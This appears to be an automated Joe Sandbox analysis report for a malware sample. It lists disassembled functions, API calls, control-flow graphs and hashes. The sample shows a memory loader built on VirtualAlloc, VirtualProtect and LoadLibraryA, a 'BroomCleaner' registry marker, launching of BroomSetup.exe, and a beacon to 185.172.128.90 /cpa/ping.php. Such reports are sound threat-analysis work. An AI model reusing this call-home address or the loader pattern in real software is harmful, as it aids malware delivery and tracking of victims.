                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCC12B71E04249AFDB11CFA9C851BEE7BB1BF19314F04019AE854B7392C7789D81CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CE003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1546 5ce003c-5ce0047 1547 5ce004c-5ce0263 call 5ce0a3f call 5ce0e0f call 5ce0d90 VirtualAlloc 1546->1547 1548 5ce0049 1546->1548 1563 5ce028b-5ce0292 1547->1563 1564 5ce0265-5ce0289 call 5ce0a69 1547->1564 1548->1547 1566 5ce02a1-5ce02b0 1563->1566 1568 5ce02ce-5ce03c2 VirtualProtect call 5ce0cce call 5ce0ce7 1564->1568 1566->1568 1569 5ce02b2-5ce02cc 1566->1569 1575 5ce03d1-5ce03e0 1568->1575 1569->1566 1576 5ce0439-5ce04b8 VirtualFree 1575->1576 1577 5ce03e2-5ce0437 call 5ce0ce7 1575->1577 1579 5ce04be-5ce04cd 1576->1579 1580 5ce05f4-5ce05fe 1576->1580 1577->1575 1582 5ce04d3-5ce04dd 1579->1582 1583 5ce077f-5ce0789 1580->1583 1584 5ce0604-5ce060d 1580->1584 1582->1580 1588 5ce04e3-5ce0505 LoadLibraryA 1582->1588 1586 5ce078b-5ce07a3 1583->1586 1587 5ce07a6-5ce07b0 1583->1587 1584->1583 1589 5ce0613-5ce0637 1584->1589 1586->1587 1591 5ce086e-5ce08be LoadLibraryA 1587->1591 1592 5ce07b6-5ce07cb 1587->1592 1593 5ce0517-5ce0520 1588->1593 1594 5ce0507-5ce0515 1588->1594 1590 5ce063e-5ce0648 1589->1590 1590->1583 1596 5ce064e-5ce065a 1590->1596 1602 5ce08c7-5ce08f9 1591->1602 1597 5ce07d2-5ce07d5 1592->1597 1595 5ce0526-5ce0547 1593->1595 1594->1595 1600 5ce054d-5ce0550 1595->1600 1596->1583 1601 5ce0660-5ce066a 1596->1601 1598 5ce07d7-5ce07e0 1597->1598 1599 5ce0824-5ce0833 1597->1599 1603 5ce07e4-5ce0822 1598->1603 1604 5ce07e2 1598->1604 1608 5ce0839-5ce083c 1599->1608 1605 5ce0556-5ce056b 1600->1605 1606 5ce05e0-5ce05ef 1600->1606 1607 5ce067a-5ce0689 1601->1607 1609 5ce08fb-5ce0901 1602->1609 1610 5ce0902-5ce091d 1602->1610 1603->1597 1604->1599 1611 5ce056f-5ce057a 1605->1611 1612 5ce056d 1605->1612 1606->1582 1613 5ce068f-5ce06b2 1607->1613 1614 5ce0750-5ce077a 1607->1614 1608->1591 1615 5ce083e-5ce0847 1608->1615 1609->1610 1616 5ce057c-5ce0599 1611->1616 1617 5ce059b-5ce05bb 1611->1617 1612->1606 1618 5ce06ef-5ce06fc 1613->1618 1619 5ce06b4-5ce06ed 1613->1619 1614->1590 1620 5ce084b-5ce086c 1615->1620 1621 5ce0849 1615->1621 1629 5ce05bd-5ce05db 1616->1629 1617->1629 1623 5ce06fe-5ce0748 1618->1623 1624 5ce074b 1618->1624 1619->1618 1620->1608 1621->1591 1623->1624 1624->1607 1629->1600
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05CE024D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                  • Instruction ID: 6e33f2bdf11782594fc291cf2c14e660577c23c133270754904d3307328a13c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5527974A01229DFDB64CF68C984BACBBB1BF09304F1484D9E84DAB351DB70AA85CF54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042612F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1630 42612f-426166 call 4275a4 RegCreateKeyExA 1633 4261f7-4261fb 1630->1633 1634 42616c-42617f 1630->1634 1635 426206-426216 1633->1635 1636 4261fd-426200 RegCloseKey 1633->1636 1637 426182-426187 1634->1637 1636->1635 1637->1637 1638 426189-4261a8 call 402c71 1637->1638 1641 4261ab-4261b0 1638->1641 1641->1641 1642 4261b2-4261ea call 402c71 RegSetValueExA call 402bef 1641->1642 1646 4261ef-4261f2 call 402bef 1642->1646 1646->1633
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00426134
                                                                                                                                                                                                                                  • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                  • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                  • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                  • Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00426260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1648 426260-42626f 1649 426271-426277 1648->1649 1649->1649 1650 426279-4262ac ShellExecuteExA 1649->1650 1651 4262c5-4262d1 call 402bef 1650->1651 1652 4262ae-4262bf WaitForSingleObject CloseHandle 1650->1652 1652->1651
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004262BF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                  • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                  • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                  • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1655 4163fd-416411 call 41e97a 1658 416413-416415 1655->1658 1659 416417-41641f 1655->1659 1660 416465-416485 call 41e8e9 1658->1660 1661 416421-416428 1659->1661 1662 41642a-41642d 1659->1662 1672 416493 1660->1672 1673 416487-416491 call 41234b 1660->1673 1661->1662 1664 416435-416449 call 41e97a * 2 1661->1664 1665 41644b-41645b call 41e97a FindCloseChangeNotification 1662->1665 1666 41642f-416433 1662->1666 1664->1658 1664->1665 1665->1658 1675 41645d-416463 GetLastError 1665->1675 1666->1664 1666->1665 1677 416495-416498 1672->1677 1673->1677 1675->1660
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 490808831-0
                                                                                                                                                                                                                                  • Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                  • Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1680 419767-41977f call 41e97a 1683 419781-419786 call 412381 1680->1683 1684 419792-4197a8 SetFilePointerEx 1680->1684 1691 41978c-419790 1683->1691 1686 4197b9-4197c3 1684->1686 1687 4197aa-4197b7 GetLastError call 41234b 1684->1687 1690 4197c5-4197da 1686->1690 1686->1691 1687->1691 1692 4197df-4197e4 1690->1692 1691->1692
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2336955059-0
                                                                                                                                                                                                                                  • Opcode ID: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                  • Instruction ID: aba61adf325f610bb64cc2fd6d97dc3a8945be917003060b225fa659b6e0b810
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E012D37B20119ABCB159F99DC059EE7B19DF85330B28024EFC21972D0EA749C918798
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00426217 Relevance: 4.5, APIs: 3, Instructions: 35fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1694 426217-42623c CreateFileA 1695 426259-42625f 1694->1695 1696 42623e-426253 WriteFile FindCloseChangeNotification 1694->1696 1696->1695
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3805958096-0
                                                                                                                                                                                                                                  • Opcode ID: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                  • Instruction ID: 926e9ac1e5f1aba45008a0d26bda579428ca80e0843417663d772dc166ed892d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E06572701120BBD7351B99AC48FABBE6DEF856F0F050169FB01E21109A61DC0197B4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1705 401bb2-401c21 call 4275a4 call 40307c call 402fe5 call 402f6b 1714 401c51-401c61 1705->1714 1715 401c23-401c47 1705->1715 1715->1714 1716 401c49-401c4c call 40187f 1715->1716 1716->1714
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                    • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                    • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                    • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                    • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                                  • String ID: v*@
                                                                                                                                                                                                                                  • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                                  • Opcode ID: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
                                                                                                                                                                                                                                  • Instruction ID: b9e6d0c04dc114dbe46ca1cb3692bd7dbb1da951860286197dc681cf7a8c4379
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E82190B1711206AFD708DF59C889A6AF7F9FF48348F14826EE115A7341C7B8DE008B94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00425EE2 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                    • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                    • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 420165198-0
                                                                                                                                                                                                                                  • Opcode ID: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction ID: 8b308e217030a11e536693c7e770bb36c60ea871e1947f1e620e0115d8c257f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B311570D01119EBDB14EF95E985AEDFBB4BF48304F1080AEE805B3681EB786A04CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0418CCD6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1742 418ccd6-418ccef 1743 418ccf1-418ccf3 1742->1743 1744 418ccfa-418cd06 CreateToolhelp32Snapshot 1743->1744 1745 418ccf5 1743->1745 1746 418cd08-418cd0e 1744->1746 1747 418cd16-418cd23 Module32First 1744->1747 1745->1744 1746->1747 1752 418cd10-418cd14 1746->1752 1748 418cd2c-418cd34 1747->1748 1749 418cd25-418cd26 call 418c995 1747->1749 1753 418cd2b 1749->1753 1752->1743 1752->1747 1753->1748
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0418CCFE
                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0418CD1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0418C000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_418c000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction ID: f6c31ff947f6c792c9c87fdfc8291577f8ad4f585aa1ba31af4ecc7210931973
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFF068315007156BD7203BB598CCB6AB6E9EF89765F10066DE643910C0EB70F8464AB1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CE0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1755 5ce0e0f-5ce0e24 SetErrorMode * 2 1756 5ce0e2b-5ce0e2c 1755->1756 1757 5ce0e26 1755->1757 1757->1756
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,05CE0223,?,?), ref: 05CE0E19
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,05CE0223,?,?), ref: 05CE0E1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction ID: 034f719d583cdcf149d4b4900ed08659f687a8774513151b422f5fbf69caf0e9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBD0123114512877D7002A94DC0DBCD7B1CDF05B62F008421FB0DE9080C7B0964046E5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                  • Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
